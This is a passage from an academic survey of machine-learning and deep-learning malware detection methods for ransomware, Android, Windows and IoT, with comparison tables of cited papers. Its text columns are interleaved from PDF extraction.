An ontology driven framework is developed for digital ex- strings and images. More than 70k IoT malware samples are
tortion threats (i.e Rantology) which focus on windows ran- involved in the analysis which is related to the four major mal-
somware attacks [251]. Proposed ontology utilizes API functions ware families such as Mirai, Gafgyt, Tsunami and Dofloo. After
21
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 9
Comparison of recent ransomware detection techniques using ML.
Type of method Research paper Features Algorithms of classification
Keshavarzi et al. (2023) Knowledge-based systems, Ontology driven framework
[251] API functions and
behaviours
Behaviour-based Almashhadani et al. (2022) Wannacry and NotPetya, MFMCNS
[249] majority voting rule
Al-rimy et al. (2018) [224] Majority voting strategy, OR SVM
logic
Gomez-Hernandez et al Honey file trap, zero-day R-Locker
(2018) [223] attacks
Jung et al. (2018) [226] Header fields, high entropy Context-aware entropy
analysis
Scaife et al. (2016) [219] Primary & secondary CryptoDrop
indicators, Hash similarities,
Shannon Entropy
Kharaz et al. (2016) [222] File lockers, screen lockers, UNVEIL
Mehnaz et al. (2018) [227] Trap monitoring, entropy, RWGuard
IRP monitoring based patterns, profiling
Bottazzi et al. (2018) [229] IRP Mini-filter driver
Continella et al. (2016) Supervised learning ShieldFS
[228]
Morato et al. (2018) [230] Traffic monitoring, file RedFish
Network traffic monitoring based modifications
Cabaj et al. (2018) [231] HTTP traffic SDN based
Alhawi et al. (2018) [234] ML, network traffic, DT NetConverse
Min et al. (2021) [245] Device level storage, AMOEBA
Memory-based
hardware accelerators
Baek et al. (2018) [236] SSDs, NAND flash, FTL Binary DT with ID3
API calls based Harikrishnan et al. (2018) Regularized Least Square, GURLS
[237] Radial Basis Function
Ferrante et al. (2018) [238] Opcode’s frequency, Hybrid method
Android environment memory, network, and CPU
Scalas et al. (2018) [239] ML, API packs, RF R-PackDroid
Azmoodeh et al. (2018) Power consumption KNN
[204] prototypes
Berrueta et al. (2022) [250] Crypto-ransomwares, ML, File sharing traffic analysis
file activities
Wazid et al. (2022) [248] Smart healthcare-based, 5 BSFR-SH
Others phases, ML
Sibi Chakkaravarthy et al. IDH, Honeyfolder, Audit SoLA
(2020) [247] Watch, CEP
Khan et al. (2020) [246] Digital DNA Sequences, DNAact-Ran
MOGWO, BCS
Homayoun et al. (2020) ML, MFP Sequential Pattern Mining
[243]
Baldwin et al. (2018) [241] WEKA, histogram density SMO
Gen et al. (2018) [50] Random number encryption UShallNotPass

performing in-depth experiments, the accuracy of the frame- Raw malware byte code is considered for malware detection
work is accomplished at 99.78%. To label the fresh ‘‘unknown’’ which uses a down-sampling approach before the pre-processing
malware samples, this IoT-tailored method is used. Table 10 pro- stage. Down-sampling is a generic data scaling approach [33].
vides summary of recent static analysis based malware detection After that, a deep learning model can be applied. Evasion attacks
techniques using DL. make it harder to detect malwares while using deep learning.
The investigation is done on the viability of adversarial craft-
6.1.2. Dynamic and hybrid analysis based malware detection tech-
ing in favour of deep neural networks by Grosse et al. [254].
niques
Crafted inputs avoid machine learning models, and it leads to
Features of API calls are utilized by Huang and Stokes [38]. By
failure of classification. While using the DREBIN dataset, the mis-
applying a sandbox to the created log files, Deep Belief Network
classification rate is raised to 80%. So adversarial crafting is a
(DBN) is employed [32]. Similarly, Recurrent Neural Network
(RNN) is employed over events of API calls. It is a bidirectional major threat that affects security concerns. The gradient-based
RNN that observes system calls. These events are encoded as attack is also possible in a deep network. Change in particu-
high-level events (represented as 114) from malware analysers. lar bytes of the malware sample leads to attack. According to
The relationship among events and similarities of functions of Kolosnjaji et al. the probability of a malware attack is high for
LSTM is captured by RNN [28]. The true +ve rate of this model adversarial malware binaries [52]. For the above similar prob-
is 82% and the false +ve rate is 0.5% as per the experimentation lem, a gradient-based method [255] is implemented for clas-
results. sifying malware samples. MalConv network is utilized for this
22
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 10
Comparison of Static analysis techniques using DL.
Research paper Features Type of analysis Algorithms of classification
Dib et al. (2021) [79] Static features, strings and image format Static Multi-dimensional deep learning framework
Lee et al. (2021) [180] PHI-UIs and semantic feature Static Chameleon-Hunter

Fang et al. (2019) [60] PE, RL Static DQEAF

Gibert et al. (2019) [13] Mnemonics sequence Static Hierarchical CNN
Gibert et al. (2018a) [75] Byte sequence Denoising Static AE with ResNet
Gibert et al. (2018b) [78] Structural entropy Static CNN
Gibert et al. (2018c) [77] Grayscale image Static CNN
Li et al. (2019) [8] HMM, domain features, two level model Static DGA + DNN
Křcal et al. (2018) [35] Bytes Static sequence CNN
Rezende et al. (2018) [36] Grayscale Static image ResNet-50
Gibert et al. (2017) [74] Mnemonics sequence Static Shallow CNN
Kolosnjaji et al. (2017) [52] PE header features, Instruction traces, Static CNN with Feedforward NN (Nearest
imported functions and DLL files Neighbours)
Liu et al. (2017) [252] Grayscale images Static Opcode 3 gram with CNN
Yin et al. (2017) [88] Opcodes Static RNN + SVM

implementation with a 60% rate of evasion. This byte-oriented ap- Deep learning suits well for GPU environments that would
proach provides better security for the vulnerable environment. employ a model with ease of training and efficient malware de-
Though malware detection using Deep Learning is powerful, tection. Thus, current research of analysing malwares converted
efficient, and decreases the size of features heavily, it does not to the field of deep learning from static and dynamic analysis.
provide resistance to evasion attacks. The performance of the The use of the Microsoft malware classification challenge dataset
model does not depend on adding hidden layers. More advanced (BIG2015) has been the subject of comparative research [262].
research is needed in Deep Learning-based malware detection. When comparing the research from 2016 to 2017, the majority
LSTM classifier is used by extracting HTTP traffic for malware of the researchers focused on deep learning. For accurate mal-
classification in the dynamic analysis [256]. Similarly, network ware identification, a model with automotive feature extraction
behaviour is analysed and a combination of Autoencoders (AE) is required.
and Nearest Neighbour (NN) classifiers is used [257]. Kumar YongImage method is employed in a DL-based malware classi-
et al. implemented a malware detection technique by apply- fication model [73] that embeds malware where instruction-level
ing both static and dynamic analysis where the file’s metadata, information is related to disassembly metadata produced from
network data, system calls, process, and registry features are the IDA disassembler for converting image vectors. Finally, with
extracted [258]. MalShare and ViruShare are utilized as classi- a simplified design and a high rate of convergence, a deep neu-
fication sources in conjunction with the XG Boost classifier, RF ral network is formed namely malVecNet. It is motivated by
classifier, DT, NN, and KNN classifiers. Similar to Kumar et al. better performances provided by applying image-related conven-
Rhode et al. [259] applied both analysis methodologies to extract- tional neural networks. YongImage method transfers the tasks of
ing features such as API calls and classifying the data from 6809 malware analysis to the problems of image classification where
malware samples using RF, NN, and SVM classifiers. minimum domain knowledge and simple methods for extracting
By combining visualization and convolutional neural network features are enough. Optimization of malVecNet is ensured by
utilizing the idea of sentence-level categorization of Natural Lan-
techniques, a deep learning-based method for detecting Windows
guage Processing [263]. Effective training is enabled by malVec-
malware is put into practice [260]. The structure of the neural
Net. Evaluation of the model is carried out by utilizing 10-fold
network is defined on the basis of the VGG16 network and it
cross-validation over the malware dataset of Microsoft. Results
supports the hybrid visualization of malwares. To analyse the
show an accuracy level of 99.49%. Utilizing the Malimg dataset, a
samples dynamically, Cuckoo Sandbox is utilized and after that
malware classification deep learning model is proposed in which
results obtained from the dynamic analysis are transformed as
an SVM classifier is added for classifying malwares [37]. Con-
RGB colour images on the basis of developed a new static vi-
volutional Neural Networks (CNN), Multilayer Perceptron (MLP),
sualization algorithm. For encoding additional information from
and Gated Recurrent Unit (GRU) are some various Deep Learning
raw files, the designed approach employs the byte frequency
models employed for performing classification. Implementation
information of PE files and RGB colour pictures, which makes
results depict that GRU has better performance than other models
use of all three colour channels. Neural networks are trained with an accuracy of 84.92% approximately.
using static and hybrid visualization images. Results depicted that A light-weighted model for the IoT environment is introduced
accuracy is attained by the method for static visualization as to detect distributed denial of service (DDoS) malware [195]. A
91.41% and for hybrid visualization at 94.70%. Recently proposed well-defined convolutional neural network is designed to classify
dynamic and hybrid malware detection techniques using DL are the families of malware making use of image recognition methods
compared in Table 11. where grayscale images are created from malware binaries. Re-
sultant grayscale images are given as input for machine learning
6.1.3. Image based malware detection techniques classifiers. If a malicious file is found it is sent to the remote
Comprehensive representations of malware process cloud server for further classification. The size of the database of
behaviours are provided in the work [28]; for each operation’s the signature matching system is very large because it includes
execution, information such as the name, ID, name of the event, information about every malware sample. So, it is not efficient
and current directory path are recorded. After that RNN is applied for the IoT environment because the resources of IoT devices
to build a behavioural language model where outputs are inter- are fixed with certain limits. Small-sized two-layered shallow
preted as images. The CNN-trained features of images are used to CNN is needed for building lightweight malware detection and
finally classify any discovered as benign or malicious. In a similar classifying malicious behaviour with a 94.0% accuracy rate.
vein, 2D grayscale images are produced using CNN by Tobiyama A malware classification model is proposed by combining the
et al. [261]. feature of CNN and SVM [48]. SVM is utilized for differentiating
23
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 11
Comparison of recent Dynamic and Hybrid malware detection techniques using DL.
Research paper Features Type of analysis Algorithms of classification
Huang et al. (2021) [260] Visualization, CNN, VGG16, RGB colour Both static and Deep Learning based
images dynamic
Vinaykumar et al. (2019) PE Both static and LSTM+CNN, MLA
[63] dynamic
Kumar et al. (2019) [258] system calls, metadata of PE file, Both static and RF, XGBoost, DT, NN, K-NN
Network data, process and registry dynamic
features
Rhode et al. (2019) [259] API calls Machine metrics Both static and NN, RF, SVM
dynamic
AL-Hawawreh et al. (2018) Network behaviour Dynamic AE with NN
[257]
Kolosnjaji et al. (2018) [255] Byte-oriented approach, gradient-based Dynamic MalConv
Raff et al. (2017) [33] Raw malware byte code Down sampling
Athiwaratkun et al. (2017) API call sequence Dynamic LSTM, GRU
[87]
Prasse et al. (2017) [256] HTTP traffic Dynamic LSTM
Kolosnjaji et al. (2016) [52] API call sequences dynamic CRNN
Huang, et al. (2016) [38] 4.5 M files training, 2 M testing Dynamic MtNet
Grosse et al. (2016)_ [254] Adversarial crafting, DREBIN dataset Dynamic DNN

the families of malware. Malware and its family is mapped with consumer expectations. After 3 years of the apple device’s in-
the mathematical function f :n → z where n denotes the new ar- troduction in 2010, there were 150 apps available in the apple
riving malware and z denotes its family. Malimg dataset with the market and attained 1.5 million in 2015. Droid-Sec is the foremost
size of 25 families and 9339 samples are utilized for implementa- android malware classification model implemented by applying
tion. 97.5% accuracy is obtained by this CNN-SVM model. Mobile deep learning [81]. More than 200 features are extracted by
apps are represented in terms of grayscale images obtained from implementing static as well as dynamic analysis. Then the feature
mobile binaries [264]. Image processing-based malware detection set is provided as input for DNN to classify android malwares. By
techniques still require difficult methods for extracting features experimenting with 250 malware apps and 250 legitimate apps
to detect malware. BIG2015 is utilized for performing malware performance is shown to reach an accuracy of 96.5%.
analysis by multiple methods recently in different experimenta- Binaries of Windows applications are analysed by modelling
tion environments. To detect Android malware and classify the DNN [58]. The feature vector of size 1024 bit is obtained as
family of Android malware, VisDroid is implemented which is an the result of the extraction of 4 distinct sets of static features.
image-based malware detection method [265]. Hidden layered DNN involves the classification of malwares by
An automated vision-based Android Malware Detection (AMD) utilizing feature vectors. Android implements inter-component
model is proposed by developing 16 distinct fine-tuned deep communication (ICC) analysis and as a result, flow graphs of data
learning-based CNN algorithms in order to attain effective and dependency are obtained [270]. DroidDetector is a similar
classification of benign apps from malware apps with minimal method developed and uses the same procedure for classifying
computation in the stages of reverse engineering and feature android malwares like Droid-Sec [271]. CNN is constructed with
extraction [266]. Grey-coloured malware images are generated the result of 192 extracted features obtained at the end applying
to achieve accurate prediction making use of balanced or im- static and dynamic analysis.
balanced datasets. Before the CNN classification stage, the byte- A malware classification method for the mobile environment
codes associated with ‘‘classes.dex’’ files are extracted from the is proposed on the basis of grayscale images [264]. To provide in-
malware and benign apps and transformed into grayscale and put for the classifiers, grayscale images are obtained after execut-
colour visual images. An imbalanced benchmark Leopard Android ing all the samples, and features are extracted. The implemented
dataset composed of 14 733 malware app samples and 2486 model is tested with a dataset that includes android samples of
benign app samples is utilized to evaluate the detection efficiency 50,000 and apple samples of 230. Among android samples 24,553
AMD model. Several experimental scenarios are implemented are malicious and 25,447 are genuine samples over 71 families.
with the help of balanced and imbalanced android samples of For apple 115 samples are distinguished from 10 families.
the Leopard dataset. On the basis of the results, 99.40% accuracy VisDroid [265] is an android malware detection scheme that
is attained for balanced android samples and 98.05% accuracy is utilizes an image-oriented analysis approach which classifies
achieved for imbalanced android samples. Table 12 compares the malware families. From various malware samples with a size of
recent image-based malware analysis techniques making use of 4850 samples of android, 5 datasets of grayscale images are de-
DL. veloped. Two kinds of image feature extraction are performed and
trained with 6 distinct ML classifiers like RF, KNN, DT, Bagging,
6.2. Mobile malware detection AdaBoost, and GBC. The development of the colour histogram
is based on both local and global factors, with local features
6.2.1. Android malware detection techniques connected to robustness. To evaluate the efficiency of classi-
Android phones lead in mobile phone sales with 71.62% of fiers hybridized ensemble voting classification is implemented.
sales and iOS of Apple takes next place with 27.73% of sales all Deep learning models RNN and Inception3 are utilized for the
over the world [269]. The first version of iOS was introduced classifying of malwares with the help of datasets.
in 2007, which is noted as a revolution in the mobile market MobiTive [272] is proposed with the aim of enhancing an-
because of the implementation of novel features like touch screen droid malware detection which influences the modified neural
user interfaces and virtual type keyboard. It elevated Apple to the networks for affording real-time mobile environments. MobiTive
top of the mobile device market and forced other manufacturers detects mobile malwares which are either previously or dynam-
to develop new products and operating systems in response to ically installed. Though deep learning models are efficient in
24
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 12
Comparison of recent Image-based malware detection techniques using DL.
Research paper Features Type of analysis Algorithms of classification
Almomani et al. (2022) 16 CNN algorithms, Grey coloured malware Image-based An automated vision-based
[266] images, Leopard Android dataset Android Malware Detection
Yuan et al. (2021) [267] Multidimensional markov images Image-based LCNN
Li et al. (2021) [268] binary, assembly and visible string Image-based Enhanced CNN
Gurumayum et al. (2020) Malimg dataset Image-based CNN+SVM
[48]
Francescoet al. (2020) [264] Grayscale images Image-based CNN
Bakour et al. (2020) [265] 5 types of image datasets VisDroid Image-based RNN and Inception3
Yongkang et al. (2019) [73] malVecNet Image based CNN
Su et al. (2018) [195] Light-weighted model IoT environment Image-based CNN
Agarap et al. (2017) [37] Malimg dataset Image-based CNN+MLP+GRU
Tobiyama et al. (2016) [261] 2D grayscale images Image-based CNN
Pascanu et al. (2015) [28] Behavioural language model Image-based CNN

server-side malware detection, still there are some limitations SOMDROID, an android malware detection framework by ap-
like computation power, memory size, and energy while deploy- plying an unsupervised ML algorithm ANN is proposed in the
ing in mobile devices directly. To overcome those shortcomings, work [277]. For model development, 5 lakhs different android
the proposed system calculates and examines 5 important factors. apps of 30 distinct categories are collected and 1844 distinct
The performance and accuracy of various feature types with features are extracted. Six various feature ranking methods are
neural networks are evaluated. Making use of multi-classification applied to choose significant features or feature sets. The Self-
tasks, 70,130 android malwares are classified for evaluation. Organizing Map (SOM) algorithm is implemented over the se-
A hybrid DL-enabled intelligent multi-vector malware detec- lected features (i.e permissions, app ratings, number of down-
tion method is presented [273]. It is developed by combining loads and API calls) or feature sets. To check the significance of
the salient features of CNN and Bidirectional Long Short-Term selected features, test analysis is applied. According to the results,
Memory (BiLSTM) for effective malware identification. Publicly the detection rate is attained as 98.7% for the unknown malware
available state-of-the-art datasets like Androzoo and AMD are uti- apps in the real-time environment.
lized for experimentation to evaluate the detection method. For MGOPDroid [278] an android malware obfuscation variants
effective feature selection, 5 distinct feature selection algorithms detection system is proposed on the basis of multi-granularity
are employed. The proposed mechanism outperforms the existing opcode features [278]. The opcode feature distribution difference
hybrid DL-enabled architectures like hybrid DNN-GRU and LSTM- index that is obtained before and after the deployment of ob-
GRU. 10-fold cross-validation is implemented for depicting the fuscation is used with the TFIDF technique to get the opcode
performance of the proposed method and the results are obtained feature weight. On the basis of opcode encoding mapping rules,
as 99.05% accuracy, 99.39% precision and 99.41% F1-score. opcode features are then translated as sequences, and sequences
To classify the android malware family, a multi-stream-based are then turned into grayscale images to achieve feature visual-
deep learning network is utilized [274]. Input data of CNN is ization. DL model is integrated with Resnet and the global average
obtained from a few files of every android malicious app in pooling layer is developed for detecting malware variants. MGOP-
string format. A dimensional convolution filter-based network Droid can be used in mobile devices and ensures automated
is applied over files or sections to classify the malware family. malware detection, behaviour updates, and real-time app instal-
Further, gradient analysis is utilized for visualizing the main files lation monitoring. Based on the observed results, 96.35% and
and sections. DREBIN and AMD malware datasets are used for 94.55% detection accuracy are attained for obfuscated samples
validating the effectiveness during experimentation. The findings and obfuscated malwares respectively. DL-based recent android
show that the 1D CNN model achieves 93.2% accuracy, which is malware detection techniques are compared in Table 13.
higher than the 2D CNN model’s accuracy.
With the detailed analysis of the android permission system, 6.3. Windows malware detection techniques
the deep layer clustering technique is applied for identifying per-
mission usage patterns of several groups of android apps [275]. Cuckoo sandbox [32] is utilized for tracing the runtime be-
A large size dataset is built with 16 000 apps and 118 features. haviour of every malware in which every behaviour report is
Automatic identification and classification of permission usage converted as a 20,000-bit vector with the help of uni-grams. A
patterns is aimed by utilizing the combination of Self Organizing bit vector is used as the input for the DNN’s signature creation.
Map (SOM) and K-means clustering algorithms. To validate the SVM is utilized for the classification of malware by accessing
technique, the SVM classifier is employed with the identified signatures. It utilizes 1800 malware application samples that have
patterns in terms of coherence and generalizability during mal- been experimented which attained a classification accuracy of
ware detection. Results exhibit 93.5% accuracy for the model 96.4%.
without potential malware and 94.1% accuracy for the model with Hybrid Analysis for Detection of Malware (HADM) [279], a
potential malware. deep learning model, involves the extraction of features both
One dimensional CNN-based android malware detection statically and dynamically. Static analysis characteristics are ex-
framework DroidMalwareDetector [276] is developed with the tracted and transmitted as feature vectors, whereas dynamic
aim of automated feature extraction and selection, 1D data exe- analysis features are obtained as feature vectors as well as graphs.
cution with CNN and permissions-based comprehensive malware DNN is developed by training the feature vectors. Likewise, vari-
analysis using intents and API calls. De-facto standard dataset ous graph kernels are incorporated with the graph-based feature
with the size of 14,386 apps is utilized for training and testing vector. For classification purposes, kernel matrices are built and
purposes during experimentation. DroidMalwareDetector forwarded for ML classifiers like SVM. Thus, hierarchical Multi-
achieved an accuracy of 0.9, which is regarded as high, according ple Kernel Learning (MKL) is combined with deep learning, and
to the results. accuracy is attained as 94.7%. MKL research work on windows
25
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 13
Comparison of recent Android mobile malware detection techniques using DL.
Research paper Features Type of malware Algorithms of classification
Tang et al. (2022) [278] Multi-granularity opcode features, TFIDF Android MGOPDroid
algorithm, DL model, Resnet
Arvind et al. (2022) [277] ANN, SOM, t test analysis Android SOMDROID
Talha Kabakus et al. (2022) 1DCNN, De-facto standard dataset, intents Android DroidMalwareDetector
[276] and API calls
Namrud et al. (2022) [275] SOM, K means clustering, coherence and Android Deep layer clustering technique
generalizability
Kim et al. (2022) [274] 1D CNN, gradient analysis, DREBIN and Android Multi-streams based deep leaning
AMD malware datasets network
Gao et al. (2021) [163] GCN, heterogeneous graph, App-API and Android GDroid
API-API edges
Haq et al. (2021) [273] CNN and BiLSTM, Androzoo and AMD Android Mybrid DL enabled intelligent multi
datasets, DNN-GRU and LSTM-GRU, vector
Feng et al. (2021) [272] Binary Android MobiTive
Francesco et al. (2020) [264] Grey scale images Android DNN
Bakour et al. (2020) [265] 5 types of image datasets VisDroid Android RNN and Inception3
Yuan eta al (2016) [271] Static and dynamic Android DroidDetector CNN
Saxe et al. (2015) [58] Static features Android DNN
Wei et al. (2014) [270] ICC flow graphs Android Amandroid
Yuan et al. (2014) [81] More than 200 features by hybrid analysis Android Droid-Sec

malware is carried out before HADM by applying Gaussian ker- blocks during training. A real-time malware dataset is collected
nel and Spectral kernel on the feature part [280]. A proposed with the deployment of low and high-interaction honeypots over
CNN-based method for detecting Windows malware utilizes be- an enterprise organizational network. Dataset with the size of
haviour features of runtime executable files for both detecting 15,457 Portable Executable samples with the size of 25 GB is
and classifying unknown malwares [281]. 10-fold cross-validation obtained after performing post-processing and cleaning. Among
is tested to evaluate the ability of this approach. Additionally, the them, 8775 are malicious samples and 6681 are benign samples.
malware executable files are handled effectively using the Relief Accuracy of PROUD-MAL is accomplished as above 98.09% on the
Feature Selection technique. Results show a 97.968% of accuracy created dataset which is regarded as having superiority to current
in windows malware detection. convolutional ML techniques. Table 14 compares the important
A Deep Learning-based malware detection method that uti- features of Deep Learning-based Windows malware detection
lizes the combination of a visualization technique and CNN [282] techniques.
is proposed that uses VGG16 network-based CNN. Both static
and dynamic analysis approaches are incorporated for visualizing 6.4. IoT malware detection techniques
malware. Cuckoo Sandbox is utilized for dynamically analysing
unknown samples and converting the results of dynamic analysis
Based on McKinsey Global Institute’s report, 127 new devices
into visualization images using a designed algorithm. Further,
are connected in IoT environment per second, and it is expected
the neural network is trained by these images and 2 different
to reach above 64 Billion USD by the year 2025 which shows
models are constructed. Two distinct detection models are tested
that the market of IoT remains at the top and it is forecasted to
with accuracy levels of 82.5% and 92.5%. Multiple dimension-
reach 11 Trillion USD in 2025 [286,287]. Due to the increase in
ality reduction methods like PCA and autoencoder are utilized
for proposing distinct feature vectors for grouping [283]. Three the usage of IoT devices by multiple organizations over the world,
models – HFVC, OEL, and BENN – include different dimensionality the possibility of attacks also increases in recent days [288]. IoT
reduction methods and architectures. A public dataset of 138,047 Security’s current state is given in-depth, along with the areas
benign and malware samples is used for examining the proposed that need further attention [289]. Classical protection systems like
method. The F1 score for both the OEL and BENN models was over anti-virus cannot act proactively to detect malware because of the
0.9. enormous amount of malware development per day.
Deep CNN and Xception CNN models are combined for mal- Malware detection method using deep eigenspace learning is
ware visualization and classification in Windows and IoT envi- implemented in the Internet of Battlefield Things (IoBT) environ-
ronments [284]. Grayscale, RGB and Markov images are utilized ment through the sequence of opcodes [65]. Optimization is done
by the deep CNNs making use of traditional learning and transfer by the implementation of eigenspace learning for differentiating
learning techniques. In the initial step, all the malware images legitimate and illegitimate apps. By applying ML, insertion attack
are generated from malware binaries. Markov probability matrix of junk code is avoided. Neural networks and DT (Decision Tree)
plays a key role in retaining global statistics of malware bytes provide a detection accuracy of 94.93%. Besides, NB (Naive Bayes)
during Markov image creation. Gabor filter-based technique is (Naive bayes) and KNN (K-Nearest Neighbour) (K Nearest Neigh-
used for extracting textures and deep CNNs are trained on the bour) are also utilized with the accuracy of 95.90% detection of
ImageNet dataset which comprises 1.5 million images. Microsoft malwares.
malware challenge dataset with the size of 500 GB is utilized Three different DL-based malware detection approaches are
for obtaining enhanced classification results in terms of accuracy, surveyed which employ CNN with the consideration of various
99.05% for custom CNN and 99.22% for Xception CNN. features like byte sequence, colour images, and assembly se-
A static analysis deep unsupervised windows malware detec- quences [290]. IoT malware samples of 15 000 and legitimate
tion framework namely PROUD-MAL is proposed in the work samples of 1000 are utilized for creating a training dataset. As-
[285]. The feature attention-based neural network (FANN) ar- sembly sequences are more accurate than byte sequences, ac-
chitecture serves as the pseudo labels for the feature attention cording to implementation results. IoT systems attack models
26
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 14
Comparison of Windows malware detection techniques using DL.
Research paper Features Type of malware Algorithms of classification
Rizvi et al. (2022) [285] FANN, static analysis Windows PROUD-MAL
Sharma et al. (2022) [284] Markov images, transfer learning, Windows & IoT Deep CNN and Xception CNN
Aslam et al. (2021) [283] PCA and auto encoder Windows HFVC, OEL, and BENN
Shiv darshan et al. (2019) [281] Behaviour, Relief Feature Selection Windows CNN
Huang et al. (2018) [282] Cuckoo sandbox Windows Visualization technique and CNN
Xu et al. (2016) [279] Hybrid analysis Windows HADM, DNN
David et al. (2015) [32] Behaviour report, Windows DeepSign, DNN+SVM

are investigated on the basis of ML techniques like supervised Byzantine Median (BM) and Byzantine Krum (BK) are applied for
learning, unsupervised learning, and reinforcement learning. verifying effectiveness. Based on the results, accuracy is increased
While using SVM for detecting IoT-based android malware it by 8% when compared with existing methods.
attains an accuracy rate of 0.99 from the dataset created [291] An effective feature subset selection approach is proposed
that employs the Naive Bayes classifier [292]. An accuracy of to detect IoT Botnet cyber-attacks making use of meta-heuristic
98% is attained by this classification method where a decision methods like scatter search (ScS) and K-Medoid sampling [295].
tree is also used. Further, a similar decision tree-based detection In order to achieve optimal detection of IoT botnets with reduced
method obtained an F- score of 97% [293]. Similarly, while using features, various classifiers are proposed like Averaged Two-
Naïve Bayes the F- score is obtained as 51% and a 94% F- score dependence Estimator (A2DE) Bayesian, JChaid* decision tree,
is attained while using Logistic Regression. 98.2% accuracy is DL-based CNN, Deep MLP and unsupervised classification making
attained by implementing an IoT malware detection method that use of hybrid K-means clustering and genetic algorithm (HGC).
utilizes a KNN classifier and considers the fingerprint feature for The UNSW-NB15 dataset is utilized for experimental purposes.
extraction [44]. While considering the results, 100% accuracy is attained and 0
In order to minimize the damage to IoT devices, Dynamic false alarm rate for identifying network breaches.
analysis for IoT malware detection (DAIMD) is proposed by im- A deep active learning-based IIoT malware detection frame-
plementing a well-known as well as novel IoT malware detection work is proposed by utilizing PSE (phase space embedding), SAE
technique [104]. CNN model is used by the DAIMD scheme for (sparse autoencoder) and LSTM (long–short term memory) net-
learning. Dynamic IoT malware analysis is performed in a nested work with an action-value function for training active learn-
cloud environment and then behaviours associated with mem- ers [296]. By identifying the occurrence, this approach considers
ory, network, virtual file system, process, and system calls are PSE or SAE as a policy when deciding how to proceed. It is a
extracted. Behaviour images are created by converting extracted hypothetical framework where fusion strategies are evaluated to
behaviour, and then CNN is used to train and categorize those im- improve the performance of malware classification. On the basis
ages. To tackle the problems with portraying the flaws caused by
of observed experimentation results, by using 50% of the training
variances in platforms, the RGB picture approach [268] is advised
data, classification accuracy is achieved at 95.1% and adversarial
for representing IoT features. The created image includes various
classification accuracy is attained at 86.9%.
information about malware such as binary, assembly, and visible
IoT malware detection and prevention framework is proposed
string. Utilizing a combination of the self-attention mechanism
by utilizing hybrid optimization techniques and deep learning
and spatial pyramid pooling, enhanced CNN is used to identify
techniques [297]. A cyber security warning system is developed
the variants. Enhanced CNN overcomes the size issues related
with a large-scale dataset where the index system is first de-
to IoT malware. The proposed method is compared with a few
signed and then index factors are selected and computed for eval-
states of the art over 10 000 samples (i.e 25 families) and accuracy
uating the situation. Grey Wolf Optimization algorithm (GWO)
is achieved at 98.57% for IoT malwares based on experimental
and Whale optimization algorithm are integrated for building
results.
the framework (WGWO). GWO enhances the feature selection to
Lightweight Convolutional Neural Networks (LCNN) based IoT
malware classification approach is proposed in the work [267]. obtain appropriate features by removing noisy features. Various
Multidimensional Markov images are obtained by the conversion pre-processing methods are integrated by the smart initialization
of malware binaries without performing reverse and dynamic step for ensuring informative features. Tensorflow deep neural
analysis processes. To classify malware images, the design of network is used for classification during experimentation. For
LCNN is intended into 2 processes-depth wise convolutions and testing, malware samples are gathered from the Mailing database.
channel shuffle. When comparing the LCNN model to the VGG16 Results depict that 99% accuracy is obtained which is considered
model, the former is smaller (1MB) while the latter is larger higher.
(552.57MB). 95% accuracy is gained while applying the proposed Deep Learning (DL) based Bidirectional-Gated Recurrent Unit-
model with the grey images of various datasets of IoT malware. Convolutional Neural Network (Bi-GRU-CNN) model is proposed
99.356% accuracy is attained with the Microsoft dataset. for detecting IoT malwares and classifying the families [298]. For
Federated learning (FL) based Industrial IoT based android the Bi-GRU-CNN model, binary file byte sequences are provided
malware detection architecture; Fed-IIoT suggested by Taheri as an input feature in the ELF (Executable and Linkable) format.
et al. [294], composed of two parts — participant side and server The performance of the model is evaluated by making use of RNN-
side. On the participant side, Generative Adversarial Networks based DL model combinations. According to the results, 100%
(GAN) and federated GAN are used for triggering the data by accuracy is attained for IoT malware detection and 98% accuracy
implementing two poisoning attacks. The server side is involved is achieved for IoT malware family classification.
in global model monitoring and robust training model construc- A three-phase deep malware detection framework DMD-DWT-
tion. In addition, it proposed a defence algorithm namely avoiding GAN is proposed for IoT-based smart agriculture (IoT-SA) systems
anomaly in aggregation by a GAN network (A3GAN) which is by combining Discrete Wavelet Transform (DWT) and Generative
formed on the basis of cumulating FL and GAN algorithms in order Adversarial Network (GAN) [299]. A multi-resolution analysis is
to detect server-side adversaries. The Byzantine defence algo- performed by applying DWT where the image is decomposed
rithm is modified and adopted and two countermeasure solutions as Approximation coefficients (Ac) and Detail Coefficients (Dc).
27
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 15
Comparison of recent IoT malware detection techniques using DL.
Research paper Features Type of malware Algorithms of classification
Santosh et al. (2022) [299] Multiresolution & in-depth analysis, LCNN, IoT DMD-DWT-GAN
MalImg datasets
Chaganti et al. (2022) [298] ELF, RNN based DL model combinations IoT Bi-GRU-CNN
Nagaraju et al. (2022) [297] GWO & Whale optimization, Tensorflow IoT Hybrid optimization
DNN (WGWO)
Khowaja et al. (2021) [296] PSE, SAE, hypothetical framework, IIoT IoT Q-learning and LSTM
Panda et al. (2021) [295] A2DE Bayesian, JChaid* DT, Deep CNN, Deep IoT Scatter search (ScS) and
MLP, hybrid K-means clustering and HGC K-Medoid sampling
Taheri et al. (2021) [294] Federated GAN, A3GAN, Byzantine defence IoT Fed-IIoT
algorithm
Yuan et al. (2021) [267] Multidimensional markov images, depth IoT malware LCNN
wise convolution and channel shuffle
Li et al. (2021) [268] Binary, assembly and visible string IoT malware Enhanced CNN
Jeon et al. (2020) [104] Behaviour images IoT malware DAIMD
Duc Nguyen et al. (2019) Fingerprint feature IoT malware KNN
[44]
Nguyen et al. (2018) [290] Byte sequence, colour images, and assembly IoT malware CNN
sequences
Azmoodeh et al. (2018) [65] Sequence of opcodes IoT malware Deep eigenspace learning

Malware families are involved in in-depth analysis by employ- the purpose of rapid detection and classification of APT attacks
ing lightweight Convolutional Neural Network (LCNN) which is on the NSL-KDD dataset, machine learning techniques such as
considered to be multi-class classifier. IoT malware and Mal- C5.0 decision trees, Bayesian networks, and deep learning are
Img datasets are utilized for evaluating the performance of the employed. Additionally, a 10-fold cross-validation technique is
proposed framework. Experimental results show that 99.99% ac- employed to test these models. Based on the experimental find-
